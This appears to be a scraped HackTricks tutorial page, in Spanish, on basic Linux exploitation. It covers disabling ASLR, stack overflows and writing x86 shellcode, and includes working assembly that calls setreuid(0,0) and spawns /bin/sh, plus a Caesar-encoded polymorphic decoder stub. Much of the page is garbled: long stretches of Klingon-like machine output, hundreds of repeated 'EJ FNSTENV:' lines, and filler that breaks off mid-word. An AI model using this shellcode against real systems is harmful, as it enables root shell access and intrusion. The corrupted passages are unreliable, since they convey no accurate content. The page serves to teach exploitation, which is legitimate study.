| .. | ||
| rop-leaking-libc-address | ||
| bypassing-canary-and-pie.md | ||
| format-strings-template.md | ||
| fusion.md | ||
| README.md | ||
| ret2lib.md | ||
| rop-syscall-execv.md | ||
Linux Exploiting (Basic) (SPA)
Linux Exploiting (Basic) (SPA)
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ASLR
Aleatorización de direcciones
Desactiva aleatorizacion(ASLR) GLOBAL (root):
echo 0 > /proc/sys/kernel/randomize_va_space
Reactivar aletorizacion GLOBAL: echo 2 > /proc/sys/kernel/randomize_va_space
Desactivar para una ejecución (no requiere root):
setarch `arch` -R ./ejemplo argumentos
setarch `uname -m` -R ./ejemplo argumentos
Desactivar protección de ejecución en pila
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo
Core file
ulimit -c unlimited
gdb /exec core_file
/etc/security/limits.conf -> * soft core unlimited
Text
Data
BSS
Heap
Stack
Sección BSS: Variables globales o estáticas sin inicializar
static int i;
DATA jImej: ghItlhmeH ghom oghmeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghommeH ghomme
int i = 5;
Sección TEXT: Instrucciones del código (opcodes)
Sección HEAP: Buffer reservados de forma dinánima (malloc(), calloc(), realloc() )
Sección STACK: La pila (Argumentos pasados, cadenas de entorno (env), variables locales…)
1.STACK OVERFLOWS
buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
Para obtener la dirección de una función dentro de un programa se puede hacer:
objdump -d ./PROGRAMA | grep FUNCION
ROP
Call to sys_execve
{% content-ref url="rop-syscall-execv.md" %} rop-syscall-execv.md {% endcontent-ref %}
2.SHELLCODE
Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep “__NR_”
setreuid(0,0); // __NR_setreuid 70
execve(“/bin/sh”, args[], NULL); // __NR_execve 11
exit(0); // __NR_exit 1
xor eax, eax ; limpiamos eax
xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar
mov al, 0x01 ; eax = 1 —> __NR_exit 1
int 0x80 ; Ejecutar syscall
nasm -f elf assembly.asm —> Nos devuelve un .o
ld assembly.o -o shellcodeout —> Nos da un ejecutable formado por el código ensamblador y podemos sacar los opcodes con objdump
objdump -d -Mintel ./shellcodeout —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes
Comprobar que la shellcode funciona
char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80”
void main(){
void (*fp) (void);
fp = (void *)shellcode;
fp();
}<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span>
Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en strace ./PROGRAMA_COMPILADO
A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código.
EJ TRUCO (/bin/sh):
jmp 0x1f ; Salto al último call
popl %esi ; Guardamos en ese la dirección al string
movl %esi, 0x8(%esi) ; Concatenar dos veces el string (en este caso /bin/sh)
xorl %eax, %eax ; eax = NULL
movb %eax, 0x7(%esi) ; Ponemos un NULL al final del primer /bin/sh
movl %eax, 0xc(%esi) ; Ponemos un NULL al final del segundo /bin/sh
movl $0xb, %eax ; Syscall 11
movl %esi, %ebx ; arg1=“/bin/sh”
leal 0x8(%esi), %ecx ; arg[2] = {“/bin/sh”, “0”}
leal 0xc(%esi), %edx ; arg3 = NULL
int $0x80 ; excve(“/bin/sh”, [“/bin/sh”, NULL], NULL)
xorl %ebx, %ebx ; ebx = NULL
movl %ebx, %eax
inc %eax ; Syscall 1
int $0x80 ; exit(0)
call -0x24 ; Salto a la primera instrución
.string \”/bin/sh\” ; String a usar<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span>
Qap Stack(/bin/sh) laH:
section .text
global _start
_start:
xor eax, eax ;Limpieza
mov al, 0x46 ; Syscall 70
xor ebx, ebx ; arg1 = 0
xor ecx, ecx ; arg2 = 0
int 0x80 ; setreuid(0,0)
xor eax, eax ; eax = 0
push eax ; “\0”
push dword 0x68732f2f ; “//sh”
push dword 0x6e69622f; “/bin”
mov ebx, esp ; arg1 = “/bin//sh\0”
push eax ; Null -> args[1]
push ebx ; “/bin/sh\0” -> args[0]
mov ecx, esp ; arg2 = args[]
mov al, 0x0b ; Syscall 11
int 0x80 ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL)
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
EJ FNSTENV:
**EJ
fabs
fnstenv [esp-0x0c]
pop eax ; Guarda el EIP en el que se ejecutó fabs
…
Egg Huter:
QI'lop Hut:
QaStaHvIS pagh memory pages associated to process vItlh shellcode 'ej vItlh (shellcode 'ej pong signature). vItlh cases vaj injection code vItlh chenmoH space, 'ej vItlh.
Shellcodes polimórficos
QI'lop polimórficos:
QaStaHvIS shells encrypted 'ej vItlh chenmoH code vItlh decrypt 'ej jump to, Call-Pop trick 'oH 'ej 'ej example encrypted Caesar:
global _start
_start:
jmp short magic
init:
pop esi
xor ecx, ecx
mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá)
desc:
sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar)
sub cl, 1
jnz desc
jmp short sc
magic:
call init
sc:
;Aquí va el shellcode
- QapHa' 'e' Frame Pointer (EBP)
QapHa' 'e' chenmoHwI' 'ejDaq vItlhutlh. 'ejwI' 'ejDaq 'e' EBP 'ejDaq 'e' EIP vItlhutlh.
'e' chenmoHwI' qatlh 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chenmoHwI' 'ejDaq 'e' chen
movl %ebp, %esp
popl %ebp
ret
De'wI' vay' DajatlhlaHbe'chugh, fvuln (ghItlhvam) DaH jImejDaq ghaH 'ej DaH jImejDaq ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 